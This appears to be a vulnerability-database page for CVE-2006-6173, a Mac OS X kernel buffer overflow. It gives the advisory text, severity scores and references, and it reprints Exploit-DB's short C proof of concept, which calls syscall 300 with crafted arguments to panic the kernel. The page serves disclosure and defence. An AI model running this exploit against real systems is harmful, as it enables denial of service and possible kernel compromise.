CVE-2006-6173 : Detail

CVE-2006-6173

0.22%V4
Local
2006-11-30
15h00 +00:00
2017-07-28
10h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Buffer overflow in the shared_region_make_private_np function in vm/vm_unix.c in Mac OS X 10.4.6 and earlier allows local users to execute arbitrary code via (1) a small range count, which causes insufficient memory allocation, or (2) a large number of ranges in the shared_region_make_private_np_args parameter.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 29201

Publication date : 2006-11-28 23h00 +00:00
Author : LMH
EDB Verified : Yes

/* source: https://www.securityfocus.com/bid/21349/info Apple Mac OS X is prone to a local memory-corruption vulnerability. This issue occurs when the operating system fails to handle specially crafted arguments to a system call. Attackers may exploit this issue to cause a kernel panic, effectively denying further service to legitimate users. Due to the nature of this issue, successful exploits may potentially result in the execution of arbitrary machine code in the context of the affected kernel, but this has not been confirmed. Mac OS X version 10.4.8 is vulnerable to this issue; other versions may also be affected. */ /* * Copyright 2006 (c) LMH <lmh@info-pull.com>. * All Rights Reserved. * ---- * .---. .---. * : : o : me want cookie and clues! L0W LEVA! - A J. H * _..-: o : :-.._ / * .-'' ' `---' `---' " ``-. * .' " ' " . " . ' " `. * : '.---.,,.,...,.,.,.,..---. ' ; * `. " `. .' " .' kudos to ilja, kevin and icer. * `. '`. .' ' .' "proof of concept" for * `. `-._ _.-' " .' .-------. MOKB-28-11-2006. * `. " '"--...--"' . ' .' .' · o ·`. * .'`-._' " . " _.-'`. : C o C o A : * .' ```--.....--''' ' `:_ o o : * .' " ' " " ; `.;";";"; _' * ; ' " ' . ; .' ; ; ; * ; ' ' ' " .' .-' * ' " " ' " " _.-' */ #include <stdio.h> #include <sys/types.h> #include <fcntl.h> int main() { /* shared_region_make_private_np = 300 (xnu-792.6.70), 3rd arg unused */ syscall(300, 0x8000000, 0xdeadface, 0xffffffff); return 0; }

Products Mentioned

Configuraton 0

Apple>>Mac_os_x >> Version To (including) 10.4.6

References

http://secunia.com/advisories/23120
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.us-cert.gov/cas/techalerts/TA07-072A.html
Tags : third-party-advisory, x_refsource_CERT
http://www.securityfocus.com/bid/21349
Tags : vdb-entry, x_refsource_BID
http://securitytracker.com/id?1017306
Tags : vdb-entry, x_refsource_SECTRACK
http://www.securitytracker.com/id?1017751
Tags : vdb-entry, x_refsource_SECTRACK
http://www.vupen.com/english/advisories/2007/0930
Tags : vdb-entry, x_refsource_VUPEN
http://www.vupen.com/english/advisories/2006/4762
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/24479
Tags : third-party-advisory, x_refsource_SECUNIA